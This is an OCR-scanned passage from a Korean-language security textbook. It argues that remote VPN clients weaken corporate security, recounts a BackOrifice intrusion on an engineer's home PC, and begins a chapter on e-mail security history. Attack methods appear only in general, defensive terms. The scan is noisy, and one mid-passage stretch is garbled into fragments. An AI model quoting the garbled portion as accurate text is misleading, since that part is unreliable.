구체적으로 말하면 내부망들에 있는 체계들은 공동의 목적을 가지고 있는 집 합체로 간주 
되 여 방화벽 이 나 기 타 보호수단들에 의하여 인 터네 트로부터 보호된 다. 믿 음직한 집 단에 
서는 자료가 체계사이，응용프로그람사이 그리고 사용자사이에서 자유롭게 오간다. VPN 
은 인터네 트상에서 의 전송에서 바로 이 런 공정 을 결 합하여 이 공정 을 보호한다. 이 과정 
은 련속과정으로서 잘 느끼지 못할 정도로 빨리 진행되며 전송적요구와 응용적요구를 다 
만족시 킨다. 결과 원격 체 계 에 있는 알지 못할 내부사람들에 의하여 자료가 공유되 고 리 
용된 다. 


접 근 점 


내 부봉사는 내 부망에 있는 체 계 들이 리용할수 있게 하여 야 한다고 본다. 내 부망은 
표준적 으로 볼 때 조종，보호，감시되 는 환경 으로서 자기 의 보안방책 과 보안절 차를 가지 
고 있다. 봉사와 자료에 내부적 으로 접근할 때 로출 즉 그 통신에 대 한 위협 은 일정하게 
알려 지 며 일정한 수준에서 접 수되 기 도 한다. 대 부분의 기 관들은 내 부망에 대 한 보안위 
협을 알고 있으며 만약 공격을 받는 경우 그 위험수준이 손해값과 정비례한것으로 예상 
하고 있다. 이 대부분은 사용자들에 대한 통제가 얼마 없는데 원인이 있다. 회사들은 인 
터네 트에 비 하여 내부망에 있는 사람들이 더 적고 사람들호상간의 통신이 필요하며(그래 
서 망이 있다.) 매 체계들은 필요하면 감시될수도 있으므로 내부자원에는 더 큰 위험이 
있게 된다고 본다. 일부 통계자료들을 보면 회사자료에 대한 공격으로 내부망이 더 큰 
위협을 받는것으로 나타나고 있지만 회사들에서는 자기 울타리내부통제는 잘할수 있다고 
확신하는것이다. 지어는 보안방책도 없고 취약성이 있는 기관들도 아직 여유는 있으니 
그에 맞게 보안방책 을 실 행하면 될 것 이 라고 항상 생 각만 하고 있 다. 그럼 에 도 불구하고 
인터네트는 많은 기관들에 생각했던것보다 훨씬 더 큰 위험으로 되고 있으며 일부 회사 
들은 그것을 현실로 체 험하였다. 근본문제는 인터네트가 아직 미지의것 으로서 위협은 계 
속될것이며 그렇기때문에 내부망에 대한 보다 예견성 있는 보안대책을 강구하여야 한다 
는것 이 다. 어 느 경 우에 나 정 보공유에 도 기 업 의 성장자원 에 도 내 부망이 리용된 다. 바로 그 
러 한 열 린 통신을 사람들은 집 에 앉아 인 터네 트로 하기 를 바라는것 이 다. 
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VPN 기술은 바라는 생각과 통제권사이의 완전한 모순의 결정체이다. 응용프로그람들, 
봉사형 태들 그리 고 자료들이 있는 내부망은 보안관리자들이 관리하는 일정한 형 태의 방 
화벽，절 차 및 공정 에 의하여 안전하다고는 간주된 다. 그러 나 VPN 의 본질 은 기 업보안과 
보안태도의 인식 이 라는 기 초적 인 개 념을 부정한다. 기 업의 방화벽강화로 하여 격퇴 당하 
였 던 공격 자들은 원격 VPN 의 뢰기 들을 상당히 쉬 운 공격 대 상으로 삼을수 있 다. 

전반적으로 보면 관리담당자들은 언제나 보안보강조치를 취하고 공정들을 갱신하며 
기간체계들에 대한 전반적보안유지 및 보수를 진행하여 체계에 취약성이 나타나지 않게 
끔 하고 있다. 한편 이 취 약점들은 말단사용자체계 에 있으므로 그 사용자들은 자기 콤퓨 
터 들을 보안관리 자들만큼 높은 수준에 서 관리하지 못하는것 이 다. 고급사용자가 전반적 보 
호안을 도입하는 경 우 많은 원격체 계 들은 기 업전반에 서 쓰는 조작체 계 를 가동시 키 지 못 
하여 본질적 으로 불안정하게 된 다. Microsoft 사의 Windows 95와 98가동환경 들이 현재 대 
다수의 개인용 즉 말단사용자급체계들에 설치되여 있으며 제한된 보안능력과 전반적인 
강력성이 있는것으로 널리 알려 져 있다. 따라서 근본적인 약점이 있으면 체계에 적용된 
어떤 보안도 약화될수 있다. 

VPN 실현 이 절 박한 요구로 나서 지 만 그 특성 들의 충돌로 말미암아 회 사의 싸이 트에 
서의 보안응용기초축성은 그만 두지 않으면 안되게 된다. 사용자가 VPN 을 리용하여 회 
사와 접속하는 순간에 벌써 인터네 트의 거의 모든 측면이 보안성 으로는 무효로 되고 만 
다. 오직 보호가 잘된 내 부망이 불안정한 환경 즉 인터네 트와 충돌하지 않는 경 우에 만 
단일보호점을 적용할수 있을것 이 다. 


보안 봉투 


이러한 전면적인 로출 즉 공개상태에 대한 파악을 충분히 하기 위하여 방화벽과 침 
입검 출체 계 라는 격 납고에 의하여 인 터네 트와 구획 지 어 진 회 사망을 상상해 보자. 그리 
고 개인소유의 체계들이 들어 있는 건물을 무장한 경비병들이 지킨다고까지 상상해 보자. 
내 부망에 서 자료가 공개 적 으로 공유되 고 접 속되 고 있 다고 가정해 보라. 그에 참가하고 
있는 매 를퓨터 가 기 관에 의하여 득같이 보호되 고 통제되 여 있 다. 

이제는 그 콤퓨터들중 하나는 통제가 없는 먼곳에 가져다 모뎀으로 점 대 점련결을 
한다. 원격콤퓨터는 아직 고립되여 있고 전화체계외에 그 어떤 다른 미타한 체계에 련결 
되지 않은 상태이다. 통신자체는 상대적으로 닉명이며 수신방해를 논다 해도 복잡하게 
되여 있다. 그러나 VPN 에서 보는바와 같이 암호화를 전화체계상의 규약에 적용하면 보 
호가 증가된다. 

다음 그 원격지에 있는 콤퓨터를 인터네트에 련결시키고 회사와 VPN 을 수립한다. 
그러면 회사사무실에 있던 때와는 다른 그런 위험이 로출되게 된다. 아직 그때와 같은 
접근은 허용된다. 

앞에서 보는 세가지 실례들에서 보는바와 같이 그 콤퓨터 가 통제환경으로부터 원격 
지에 날라 지고 전화회선접속을 하자마자 보안상태가 급격히 떨어 지게 된다. 체계가 도 
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난 당하는것으로부터 시작되여 먼곳에서 전화망으로 통신되는 도중에 자료가 털리울수 
있는 정도까지 그 위험은 다양하다. 그러나 그 체계와 그 정보의 전반적인 안전성은 상 
대적으로 보호된 상태이다. 그러나 그 원격콤퓨터가 인터네트에 가입한 때부터 위험은 
기 하급수적 으로 늘어 난다. 

첫 실례에서 체계들은 보호의 《봉투》에 있어서 보호층에 의하여 비법적인 영향을 
받지 않게 고립되여 있다. 다음 그 보호봉투를 원격체계로 확장하니 불피코 봉투는 약화된 
다. 그러 나 본질상 존재는 있으니 그 정보는 보호되여 있다. 원격전화회선접속체계로 회사 
의 보호환경에서 제공되였던 보호가 일정하게 소모되여 무한수의 위험에 직면한다. 그러나 
중요한것은 회사싸이트를 위 한 보안봉투가 그렇게 심 하게 영 향은 입지 않았다는것 이 다. 

현실적으로 원격지에서 전화회선으로 내부로 망을 직접 접속하여 생기는 위험은 대체 
로 전화체계를 통하여 비법사용자들이 접근하고 있는것과 관련되여 있다. 회사는 원격사용 
자들에 게 회 사접 근용전화번 호들을 제 공하는데 이 전화번 호들은 지 구상의 그 어 느곳에 서 나 
접 근할수 있는것 이 다. 공격 자들은 목표로 될 만한 원격 접 근전화번호들이 있음직 한 전화번호 
대역을 쉽게 신속히 알아 낼수 있다. 일단 그 대역을 알아 낸 다음 전화번호훑기 즉《다이 
얼전투》를 벌려 간섭을 얼마 하지 않고 매 전화번호들을 검사한다. 그러나 이 위험을 억제 
할수 있는 요소들은 현재 많다. 역호출，고급 및 다층식인증，확장기록，시간제한요소들，접 
근제한요소들을 잘 결합하면 공격 자에게 힘든 목표로 된다. 단일접근점 이 오직 하나이며 원 
격체계가 고립되게 되면 보안봉투는 형체를 유지하여 그대로 있게 된다. 물론 쇠퇴해 지는 
정도는 회사의 단일접근점의 보안상태와 원격체계의 고립수준에 직접 달려 있다. 

마지 막씨 나리오 즉 VPN 이 배비 되 여 인 터네 트로 회 사에 접 속하는 씨 나리 오에 서 는 보 
안이(전화회선식접근방식과 같거나 혹은 보다 높지는 못해도) 상당히 높은것으로 느껴 
진다. 왜 그렇지 않겠는가. 특성들도 꼭 갈고 보안상태도 곡 갈은것으로 보인다. 전화회 
선식대 안들에 서 는 통신 이 상대 적 으로 보호되 고 회 사에 있는 종단체 계 도 안전하고 인증대 
책도 제대로 있어 비법접근이 감소된다. VPN 도 역시 이러한 특성들을 가지고 있으며 훈 
련을 잘 주면 포괄적 인 보안봉투를 엄을수 있다. 

그러 나 VPN 의 봉투는 투명봉투 즉 VPN 이 하나의 규약처 럼 실현되지 않으면 그만한 
강도를 가지 지 못하는 보안적 측면 이 다. 회 사가 제 공한 봉투가 VPN 에 서 터질 지 경 으로 
늘어 난다. 그 요인은 원격체계가 보안측면과 보호를 조종하게 되였기때문이다. 보안봉투 
가 이제는 회사에 의해 더는 제공되거나 관리되지 않고 오히려 원격체계가 이제 와서는 
모든 보안을 현지 에서 회사쪽에 대 고 감시 하고 감독하게 되 였다는것은 명백해 진다. 

원격 체 계 가 인 터네 트와 결선하여 IP 주소를 ISP 로부터 받으면 인터네 트세 계 화의 통신 
이 이 루어 지 게 된다. 인터네 트상 어 디 엔가 회 사망으로 들어 가는 VPN 관문이 있어 거 기 
에서 내부망으로 들어 가는 접근을 제공한다. 원격체계 가 VPN 을 구성하여 자료공유에로 
들어 가면 수많은 취 약성들이 나타나서 회사가 보안봉투를 제공하려고 하는 보안대책을 
완전히 교묘하게 우회하게 된다. 이미 실현되였던 보안은 인터네트에 접속하는 바로 그 
순간에 극적으로 뒤죽박죽이 되며 원격체계는 회사보안의 《재관관》，《판사》지어는 
《처형자》가 된다. 

원격 체 계 는 매 우 강력한 VPN 해 결 책 즉 호스트체 계 가 경 로기 로서 의 역 할을 놀지 않 
고 인터네트에서 개별망으로 정보를 전송시키는 VPN 방안을 채용하였을수도 있다. 좀 더 
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설 명하면 그 VPN 방안은 내 부망으로 들어 가는 접 근을 제 한하기 위하여 제 한된 방화벽기 
능이 나 려 과기능을 리용할수 있다는것 이 다. 그러 나 이 VPN 의뢰기 나 방화벽 쏘프트웨 어 에 
의한 보호는 사용자가 해제해 치 울수 있 으므로 결국에 는 공격 받을수 있게 되 여 있 다. 
사용자가 보호를 해 제할수 없는 종합대 안을 실 행하는 경 우에 는 짐 작컨대 취 약점 이 하나 
생 기면 그것을 보강퇴 치할수 있을것 이 다. 

제 한된 수의 방화벽을 가지 고 보안관리자들이 지탱해 보려 고 애 쓰는 울타리와 방화 
벽 에 있어서 이 런 씨 나리오는 매우 례사로운 일 이며 거의 매 일 일 어 나는 일 이 다. 방화 
벽 에 대 한 기 관들의 관심 이 없어 진 조건에 서 원격 체 계의 방화벽쏘프트웨어 에서 취 약점 
들이 발견되면 보안의 와해가 어떠해 지리라는것은 짐작하기 어렵지 않다. 

취약성의 개념 


충분한 기 술과 공정 에 의하여 마련되 였 던 회 사의 보안이 파괴 되 는 극단적 인 경 우를 
잘 리해 하기 위 하여서 는 원격체계 가 인터네 트에 공개되 고 로출된 체계 라는것을 알 필요 
가 있다. 일부 경우 광대역 에서도 마찬가지 로 로출상태는 항시적이며 오랜시 간동안이 여 
서 공격자에게 가장 큰 기회를 줄수 있게 된다. 

인터네트는 불피코 위 험의 바다이 다. 그것은 인터네 트에 방대한 인적，기 술적 자원이 
있어 해커들이 닉명으로 남에게 특히 준비가 없는 사람들에게 큰 재난을 들씌울수 있기 
때 문이 다. 통신의 여 러 층에서 사용되고 영향을 미치는 공격방법 에는 여 러 가지 가 있다. 
실례로 봉사거부 ( DoS ) 공격들은 그 어떤 체계나 봉사를 완전히 마비시키는것으로서 그 목 
적은 순수 파괴이다. DoS 공격들은 규약의 취약점과 갈은 낮은 준위통신속성에서의 약점 
들이 나 응용프로그람자체 에 있는 높은 준위약점 들을 교묘하게 리용한다. 일 부 다른 공격 
들은 응용이 매 우 독특하여 정 보에 대 한 접 근이 나 정 보입 수를 위한 특수한 환경 에 쓰는 
것도 있다. 이러한 공격들이 응용오유나 이상동작들을 교묘하게 리용하는것은 점점 범상 
한 일 로 되 고 있 다. 결과 체 계 정 보를 획 득하거 나 지 어 호스트체 계 를 원격 조종하기 위한 
전용응용프로그람들이 나오고 있는것 이 다. 

트로이 목마들은 매 우 교묘해 지 고 쓰기 편리하게 되 였 다. 그것 은 주로 흔히 쓰는 조 
작체계들에 커다란 약점들이 있으며 매우 유능한 프로그람전문가들이 많이 나오는것과 
관련되여 있다. 인터네트에 련결되여 있는 어느 한 콤퓨터에 트로이목마가 설치되여 있 
으면 그것 을 리용하여 그 콤퓨터 에 침투하여 원격 조종도 하며 자료도 손에 넣 을수 있 고 
건반입력도 모두 알수 있을뿐아니라 언제 그 콤퓨터가 인터네트와 접속하기 시작하여 언 
제 접 근할수 있 는가를 공격 자가 쉽 게 알수 있 게 된 다. 일 부 경 우에 는 인 터네 트에 서 떨 어 
진 상태 에서 도 정 보를 다 수집하였 다가 그 콤퓨터의 인터네 트접 속이 수립 되 면 제끽 공격 
자에 게 그 수집 내 용을 보내 오게 도 할수 있 다. 바로 이 취 약성 을 최 악의 씨 나리오라고 볼 
수 있으며 실지 가정용콤퓨터가 피해 보는것은 례상사로 되여 있다. 

트로이목마가 설치되지 못하거나 혹은 완전히 실행되지 못하는 경우 림시적으로라도 
공격자는 접근권을 얻어 목표로 된 그 콤퓨터 나 그 사용자에 대한 사활적 인 정보를 수집 
할수 있으며 결국 계속 그런식으로 공격하여 더 큰 결과를 엄을수 있다. 항비루스프로그 
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의 실행，유지보수，안전한 일상적 
전문일군들이 있는 고도로 기술 
복잡한 일이며 인터네트전체에 H 


일 


터네트도입초기 에 콤퓨터들은 공격 
•의 정보들이 공개되군 하였다. 위 
으므로 공격에 직접 걸려 들지 않 
날부 봉사체계들은 전반적보호를 ” 
강화된 전용체계들을 DMZ 라고 하 
，로부터 내부망을 보호하게 하였다, 
fl 부체계에 대한 공격을 놀랄만큼 












에서는 대량적으로 설치하여 방대한 수의 콤퓨터들과 망들을 보호하고 있다. 이것은 
나의 관례로，인터네트생활의 기정사실로 그러나 비용이 많이 드는것으로 되고 있다. 
부체계와 자원들을 인터네트로부터 보호하는것은 가장 중요한 일이며 여기에 방대한 
력과 자금이 투입되군 한다. 

론리적으로 보면 이렇게 실현된 대부분의 보호조치들은 사적소유의 자료나 정 J 
공개되거나 변경되거나 파괴되지 않게 보호하는데 목적이 있다. 여기서 그 자료는 J 
대책에 의하여 만들어 진 보안봉투속에 남아 있다. 따라서 그 정보를 얻기 위하여 i 
자는 운영조건들을 침 투, 우회 혹은 조작해 야 한다(그림 12—6을 보라). 

VPN 의 출현으로 원격체계 는 알려 진 위험 들과 위협의 테 두리내 에서 회 사자료에 
전하게 접근하게 된다. VPN 이 통신을 보호하며 보안을 회사로부터 밖으로 나가 원근 
까지 확장할수 있 다고 생 각할수 있 다. 그러 나 이 생 각은 VPN 의 기 본구성 인 인 터네 i 
홀시한데서 나오는것 이 다. 그림 12 — 7에서 보는바와 같이 공격자는 일반사용자에게 우 
히 장악된 체계에 있는 회사자료에 접근한다. 그 체계는 축적된 경험과 기술의 보」 
받지 못하고 있다. 




공격 자의 견지 에서 그 정 보는 회 사가 인 터 네 트에 접 속상태 이 므로 인 터 네 트상에 있는 
것이다. 따라서 접근공정과 접근매체는 변함이 없고 다만 보안수준만 다를뿐이다. 결국 
그 정보는 공격자에게 주어 졌으며 보다 상당히 복잡한 통로를 거처야 하는 직접적인 접 
근은 필요 없다. 인터네트접속만 아니 라면 원격호스트들의 기능，속도，보호는 모뎀에 기 
초한 기성원격접근에 비하여 상당히 높은 수준이였을것이다. 아쉽게도 인터네트는 기능 
을 확장시켜 주는 좋은것이지만 결국에 가서는 불안전한 망이기도 하다. 

론리적으로 볼 때 이것은 정보보안의 비극이다. 인터네트의 보안과 그 위험성해소를 
위하여 얼마나 막대한 시간과 자금을 들이고 연구를 하였는지 모른다. 기초적인 경로기 
려과，방화벽，침입탐지체계로부터 시작하여 체계경화， DMZ , 공극 ( air - gap ) 들에 이르기까 
지 수많은 기 술의 벽 돌로 보안이라는 커 다란 벽 도 쌓아 놓았다. 인 터네 트를 겨 냥한 방위 
체계가 과잉되였으므로 이것으로 하여 공격자들은 다른 통로를 취하게 되여 원래 빠져 
들던 함정 이 나 덫을 피하여 우리의 가장 약한 허점으로 쳐들어 오고 있다. 

공격이 상당한 요새에 부딪쳤을 때 그 방향과 형식을 바꾸는것을 보면 중세기의 전 
쟁을 방불케 한다. 침입 자들을 격퇴 하기 위하여 높은 성벽을 쌓아 성새를 건설하였다. 주 
변수로에 물도 채우고 함정들도 파놓고 치명적인 곳곳에는 교묘한 장치를 해놓아 적들의 
공격을 저지시키게 되여 있었다. 이 성벽의 일부 장소들 특히 수로밑에는 비밀관문을 설 
치하여 정찰병들이나 간첩들이 성새를 빠져 나가 정보를 가져 오든가 아니면 봉쇄때 물 
자들을 날라 들이군 하였다. 현실은 바로 이것을 반복하는것 이 다. 지 금과 옛날전쟁사이 에 
차이나는것이 있다면 옛날에는 적에게 중요한 정보를 가지고 있는 장수나 보좌관 혹은 
그 어떤 사람도 성 밖으로 나가지 못하게 하였다는것 이 다. 



그림 12-8. 자료접 근은 취 약성 이 있고 인터 네 트관련위 험요소들이 
있는 체계에서 가능하다. 
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완전히 대조되게 지금은 회사 각층의 사람들이 밖에서도 정보에 접근한다. 이것은 
관문을 거쳐 성밖으로 공격계획을 가진 장수를 내보내서 아무런 호위도 없이 자기 천막 
에서 홀로 그 공격계획을 연구하는것과 마찬가지다. 적측에서 그 장수를 덮쳐 직접 성새 
에 들어 가지도 않고 그 정보를 얻는것은 식은죽먹기일것이다. 사실 오늘날의 공격자는 
희생자를 제 마음대로 교묘하게 조종하여 자료를 쉽게 고치고 수집할뿐아니라 그 소유자 
는 무슨 일이 진행되였는지 모르게 할수도 있을것이다. 그림 12 — 8에는 거의 저항없이 
들어 갈수 있는 통로가 어떻게 만들어 지는가를 보여 준다. 

미궁같이 복잡한 방위체계들이 건설되여 적을 정면으로 겨누고 있지만 정보는 밖으 
로 계속 새나가고 있다. 결국 잘 만들어 놓은 보호벽이 거의 무용지물로 되고 있는셈이다. 
이 전에 몇 개의 방화벽 이 단일입 구점 을 가지 고 내 부망의 정 보를 보호하였 다면 지 금 보면 
방화벽 이 없이 수천개의 입 구점 이 나 있을것 이 다. 우리는 일보후퇴하였을뿐아니 라 방화벽 
에 의한 문제 점 들도 그 규모가 상당히 커 졌 다. 인 터네 트를 도입한 초기 에 는 방화벽 이 없 
이 단일한 인터네트접속이면 충분하였다. 오늘 기관들은 여 러개의 인터네트접속에다가 복 
잡한 보호조치까지 취해야 한다. 원격콤퓨터와 자그마한 가정사무실들을 위해 VPN 을 형 
성 함으로 하여 통제 하기 어 려 운 수천 개 의 인 터 네 트접 속점 들을 가지 고 있 는셈 이 다. 

해커침습실례의 한가지 


어느 금요일 저녁쯤 큰 국가건설회사의 기사장으로 일하는 한 친구로부터 나에게 전 
화가 왔다. 그는 자기의 를퓨터가 말을 잘 듣지 않든가 주말에 낚시질을 하자든가 할 때 
면 의례히 전화를 걸어 오군 하였다. 그러나 이 전화는 시작부터 완전히 달랐다. 그는 자 
기 가 해커의 침습을 당한것 같다는것이 였다. 하드구동기가 밤새 늦게까지 돌더 니 최근에 
새 로 설치 한 블랙 아이스 ( Blacklce ) 가 상당한 량의 영문 모를 전송량을 기록하더 라는것 이 
다. 그가 모뎀케 블과 VPN 을 리 용하여 밤 아니 면 낮에 집 에서 일 을 보는데 그것 은 과잉 
전송량과 일반사무실들의 방해를 피 하기 위 해서 라는것이 였다. 또한 Windows 98을 조작 
체계 로 표준프로그람들을 씨서 자기 일을 한다는것도 이 야기하였다. 또한 그는 늘쌍 콤 
퓨터 를 켜 놓는다는것이 였 다. 그렇 게 못할것 도 없지 . 

해커의 공격을 받았다는것을 완전히 확신한 나는 그에게 그 를퓨터를 다치지 말고 
놔두고 그의 집 망에 있는 다른 를퓨터 를 리 용하여 엿 보기 도구 ( sniffer ) 를 가동시 켜 신호상 
에서 무슨 일 이 진행되는가를 보라고 하였다. 몇분후에 그의 콤퓨터와 어느 한 인터네트 
상의 호스트사이의 통신이 시작되였다. 전송내용을 똑똑히 본후에 그의 콤퓨터에 외부접 
속이 진행되고 있다는것이 명백해 졌다. 그의 경험으로 봐서 또 그가 그 콤퓨터에 설치 
한 여러 쏘프트웨어로부터 만들어 지는 기록파일들 그리고 그와 같은 처지에 빠졌던 다 
른 친구들의 이전 경험으로 봐서 나는 그의 콤퓨터가 접근을 당하고 있다고 생각했다. 
나는 케 블모뎀 에서 그 이씨네트를 다 뽑게 하였다. 그리 고는 문제의 심각성 이 어느 정도 
인가 즉 그 콤퓨터에서 대체 가지고 싶어 하는것이 무엇인가를 물어 보았다. 

몇마디의 말을 통해 보니 해커 가 회 사마크，이 름，계 약정보，경쟁 력분석，계 획시 간표， 
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가격비교까지 다 붙어 있는 전국적인 건설계획 입찰자료전반을 다 접근하고 있었던것 같 
았다. 이런 정보를 수집하여 조사해 봄으로써 품질검사와 공학적문제를 해결하는것 이 바 
로 그의 일이였다. 더 말을 주고받아 보니 사업습관과 보통기억력으로 그 자료를 언제 
마지막으로 접근하였는지 알고 있는것 갈았다. 바로 그래서 그는 기계가 한참 일을 하고 
있어 나에게 당장 전화를 걸려고 했다고 하는것이였다. 나에게 큰 일도 아닌것을 가지고 
놀라게 할가봐 항비 루스프로그람과 무료쏘프트웨 어 를 먼저 돌려 볼가 하였 다는것 이 였 다. 
결국 우리는 콤퓨터에 #어 가 무엇 이 언제 접근되였는가를 확인해 볼것을 결심하였다. 

우리가 처음으로 발견한것은 plug - in 이 있는 BackOrifice 였는데 그것을 보니 그 친구 
를 특별 히 겨 냥한 공격 같지 않았고 누군가가 인 터네 트상에 앉아서 활짝 열 려 진 
Windows 체계에 대하여 장난질을 하려고 한것 갈았다. 우리는 매 파일의 접근시간을 조 
사하기 시 작하였 다. 몇주일 전 날 밤중에 접 근한것 들이 많았다. 더 조사해 보니 그가 얼 마 
전에 받았던 의심되는 전자우편들과 숨은 디렉터리들이 나타났다. 그러자 나는 중지시키 
고 그에게 최 악의 경우를 고려하여 체계의 다른 그 무엇을 노린것 이 없겠는가고 그에게 
물었 다. 통과암호도 없는 그의 TurboTax 자료기 지 의 예 비 본이 있고 그외 에 최 근에 로임 인 
상 받은 자기 부서내 의 성 원들의 인사문건들이 있 다는것이 였 다. 

전화로 우리 는 약 세시 간 이 야기했는데 그것 이 전부이 다. 그가 자기 사장에 게는 참 
으로 고통스럽게 전화했을것이며 아마 나와 한 전화보다 더 오랜것같이 느껴졌을것이라 
고 생 각한다. 이것 이 그의 잘못인가. 회 사가 그에 게 인터네트접속과 VPN 쏘프트웨 어를 주 
었고 집 에서 인터네트접근하는것 을 장려하였다. 그와 그의 사장에 게는 이것 이 론리적 인 
것이 였다. 그는 연구에 필요해서 인터네트에 접속하였고 사실 사무실에서 보다 집 에서 일 
을 더 많이 제꼈 다. 그러 나 정 보를 채 기 위하여 고용된자 아니 면 우연히 노다지 를 만난 
스크립트장난군일수도 있는 그 공격자는 극비에 속하는 그 자료에 접근하였다. 이러나저 
러나간에 어쨌든 사고가 났으니 몇년간은 사업 에 영 향을 미칠것 이 다. 

해 결 책 


VPN 의 실행으로 인하여 생기는 보안상 문제점들은 쉽게 해결될수 있다. 고도로 발 
전된 기술을 가지고서는 해커들의 공격을 막아 낼수 있다. 해커들은 아무리 중무장으로 
보호된 망에도 비교적 쉽게 계속 접근한다. 이러한 접근이 가능한것은 설계상 오유，유지 
보수에서의 빈틈，설정상 결함 혹은 단순한 무지에 기인된다. 어쨌든 울타리에 대한 집중 
경 비 에 도 불구하고 비 법 접 근은 놀라운 속도로 계 속 일 어 나고 있 다. 인 터네 트상에 원격 
콤퓨터 가 수백대 가 있다고 가정해 보면 어 떻게 해 야 이 콤퓨터 들을 보호할수 있겠는가. 
최상의 노력을 기울였음에도 불구하고 내부망을 보호할수 없다면 가정용콤퓨터들과 이동 
형콤퓨터를 보호할 희망은 희박한것이다. 

보안실천에서 흔히 그러하듯이 정보보안에서는 보안방책이 사활적인 역할을 한다. 
자료접 근에 대 한 제 한조치 들과 정 보교환을 위한 운영파라메터 들을 설정해 놓으면 정 보의 
로출을 크게 줄일수 있다. 다른 말로 말하면 일종의 정보가 원격사무에 필요 없다고 간 
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주되면 원격접근체계는 그 정보나 그 체계에 접근하지 못하게 되여야 한다. 원격접근체 
계가 좁은 접근권을 가지면 자료는 원천적으로 보호될수 있다. 원격사용자들이 실지 접 
근할수 있는것 이 무엇 인 가를 한정해 주는 역 할은 VPN 에 서 내 부망을 보호해 주는 VPN 장 
치 바로 뒤에 있는 방화벽에서 해춘다. 그러나 이 설계는 큰 제한성을 가지고 있으며 접 
근유연성측면 에 서 VPN 규모조절 에 제 한을 주고 있 다. 다른 하나의 가능성 은 VPN 접 근장 
치 에 쓰이는 려과방법 이 있을수 있다. 려과기를 보면 내부망에 좌 넣은 전송자료들을 통 
제할수 있고 일부 경 우에 는 려 과장치 를 리용하여 실지 사용자인증이 나 실지 그룹인증도 
가능케 할수 있을것이다. 

접 근을 아무리 제 한시 킨다 해 도 원격사용자가 기밀정 보를 필요로 할 경 우도 있을것 
이며 사용자에게 만 봉사를 하는 사람들도 누구든지 그러한《 특수한 경우》를 목격 하였 
을것 이 다. 따라서 여 기서 는 기 술을 개 입 시 켜 정 보를 보호해 야 한다. 내 부망을 인터네 트로 
부터 보호하기 위하여 방화벽 에 매달렸을 때 원격체 계 가 내부정보를 파일들에게 넘기지 
못하게 하려 면 다시 기 술에 의 거할수밖에 없 다. 호스트용보호쏘프트웨어 들을 리용하는것 
은 완전히 새로운것은 아니다. 그러나 개인콤퓨터에 대한 공격이 계속 증가하게 됨으로 
써 이 러 한것 이 있다는것 이 널리 알려 지게 되 였다. 그러 나 이것들은 전반적 인 유연성 있 
는 중앙조종체 계 식 혹은 보안관리용해 결책 은 못되 며 다만 해 당 콤퓨터 에만 해 결책 으로 
된다. 결국 매 사용자가 자기체 계의 보안을 책 임 져 야 하는것 이 다. 


결 론 


VPN 의 가치는 거 대하다. VPN 은 시 간과 자금을 절 약하고 접근의 범위를 확대하며 
통신에서 최대의 유연성을 보장해 준다. 그러나 VPN 이 제공하는 개별적인 련결고리는 
공격 자들에 게 가상뒤문을 열 어 줄수 있 다. 기 밀 자료들이 VPN 을 거 처 나가게 허 용하는 
기관들은 보호내부망에서는 보지 못하던 수많은 위험들이 그 정보들을 내맡기는것이나 
같게 된다. 

VPN 제 품들은 현재 그 종류가 많으며 접 속수립방식，접 속유지 방식，내 부망에 서 흔히 
보는 봉사들을 제 공하는 방식 에서 다 특성들이 있다. 만일 원격체계 가 VPN 을 통한 중앙 
사무실과의 전용통신용이 아니라면 그 체계는 상당한 취약성을 가지고 있는것으로 볼수 
있 다. 

인 터네 트는 우리 의 생 활과 일상생 활의 곳곳에 깊숙이 침투해 들어 왔다. 그러 나 실 
지 생 활과는 일정한 계선이 항상 있 었 다고 말할수 있 다. 방화벽，모뎀，경 로기，려 과기 지 
어 열 람기 와 같은 쏘프트웨어 들은 인 터네 트에 로 들어 가는 보이 는 접 근점 일수 있 다. 기 
술이 보다 발전하게 됨으로써 인터네트와 개별망들사이의 계선은 점점 흐려 질것이다. 
그러 나 앞날을 정 확히 내 다 보지 못한다면 보안방책 과 위 기완화과정 들은 정 보테 로주의 에 
서의 발전에 따라 서지 못할것이다. 계획과 통제를 잘하지 못하면 안전해 보이는 요새통 
로 하나만 보고 다른 보호대책은 다 홀시할것이다. 그렇게 되면 요새의 성벽들은 직접적 
이 아닌 공격 에 는 무력하게 될 것 이 다. 
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제 1 3장. 전자우편보안 


물래이 랜덜 


첫 전자우편이 진행된것은 그 어떤 콤퓨터망이 제대로 리용되기전이였으므로 하나의 
여러 사용자를퓨터체계의 각이 한 사용자들사이의 통신에 국한되여 있었다. 전자우편이 
고안된것은 통신을 표준적이며 조직적이며 기능적인 과정으로 하기 위해서이며 보안상 
문제점들을 극복하기 위해서였다. 

전자우편이 사용되기 전에 사용자들은 자기체 계의 일정 한 공간내 에 공통접근구역 을 
떼놓아 다른 사용자들이 거기에 통보문이나 파일들을《떨구어 놓게》하였다. 필요한 
기술적상식이 없는 사용자들이 있음으로 하여 비사용적조건들(불충분한 특권들)과 보안 
상 문제점들(과잉특권들)이 생기게 되였다. 

대중적요구와 가능성이 있음으로 하여 일정한 기초적인 형태의 전자우편응용프로그 
탐은 거의 모든 콤퓨터조작체계의 표준부품으로 인차 제공되게 되였다. 콤퓨터응용프로 
그람들은 인차 체계호상간의 전자우편교환능력을 가지게 되였다. 

처 음으로 상업 화되 고 널 리 전개 된 대 중적 콤퓨터 망은 ITU X.25 파케 트교환망표준에 
기초하고 있었다. 보다 많은 회사들이 싸이트들사이에 련결됨으로써 비록 처음에는 통신 
이 거의나 국부망에 국한되 여 있었지만 이것은 전자우편에 재빨리 적 용되 여 이 망들에서 
콤퓨터체계들사이 에 통보문전송능력 을 부과하였 다. 처 음에는 서로 다른 판매 업체의 체계 
들사이 통보문전송을 할수 있게 표준화가 되지 못하였고 여러 기관망환경에 알맞는 관리 
및 보안조종이 부족하였다. 

처 음 이 망들에 서 사용된 전 자우편체 계 의 국제 표준화도 역 시 ITU 에 의하여 제 안되 
였는데 X.400(1984, 切이였다. 이것은 큰 상업 및 정부기관들속에 널리 채용되였 

다(비록 보다 작고 원시적인 인터네트의 형태가 존재하였고 그에 의하여 오늘도 여전히 
인터네 트전자우편의 기 초로 되 는 전자우편표준이 이 미 개 발되 였음에 도 불구하고 그 당시 
의 대중적《 인터네트》 NFSnet 의 상업적리용은 명백히 금지되 였다.). 

X.400 표준의 작성자들은 조종，보안，운영기관을 다계층화해야 할 필요성을 인정하였 
으며 나라별，행 정 관리령 역 (ADMD: Administrative Management Domain) 별，사영 관리 령 역 
(PRMD: Private Management Domain) 별，기 관별，산하단위별로 빈름없 이 계 층화된 설계 를 
해 놓았다. 그들은 또한 여 러 쏘프트웨 어판매 업 체 들간 운용호환성，통보문형 식 화에 대 한 
